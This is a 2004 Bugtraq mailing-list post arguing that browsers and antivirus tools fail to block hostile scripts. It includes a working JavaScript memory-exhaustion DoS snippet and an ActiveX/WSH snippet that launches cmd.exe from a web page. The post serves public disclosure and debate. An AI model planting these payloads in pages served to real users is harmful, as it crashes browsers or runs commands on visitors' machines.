Message-ID: <20040409150651.28078.qmail@search.securityfocus.com>
Date: 9 Apr 2004 15:06:51 -0000
From: Bipin Gautam <visitbipin@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Browser bugs [DoS] ... where will you draw a line?




Browser bugs [DoS] ... where will you draw a line?

Shouldn't developers [of browsers] draw a line... between a DoS bug and a "can be troublesome" feature in their web browsers and put necessary measures in their code to protect from such nasty code? These days... I've been seeing a lot of stupid IE/Mozilla DoS exploits. They do get patched. Should we need another "Bloodhound" technology in the browser as well for such? But...... it's strange to see that neither antivirus software nor IE / Mozilla is putting the necessary effort into their code to prevent such hostile scripts.....?

------------
<body onload="hUNT()">
<script language="JavaScript"><!--
var szhUNT="...cauz its a jungle out there!"
function hUNT()
{szhUNT=szhUNT + szhUNT
window.status="String Length is: "+szhUNT.length
window.setTimeout('hUNT()',1);}
// --></script>
-------------

OR 

you could just have a script that kicks off infinite pop-up windows!!! or at worst...... let's add a WSH script...

--------------------------------------
I guess this bug has a patch…
--------------------------------------
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<script>
wsh.Run("cmd.exe /k echo ...today is your lucky day!");
</script>
--------------------------------------

... such browser features are far *MORE* troublesome than *any* browser DoS BUGS!!!

the solution shouldn't be to disable scripting...... etc!

so ??????

./hUNT3R
-------------------------------------
http://www.geocities.com/visitbipin
http://www.01security.com

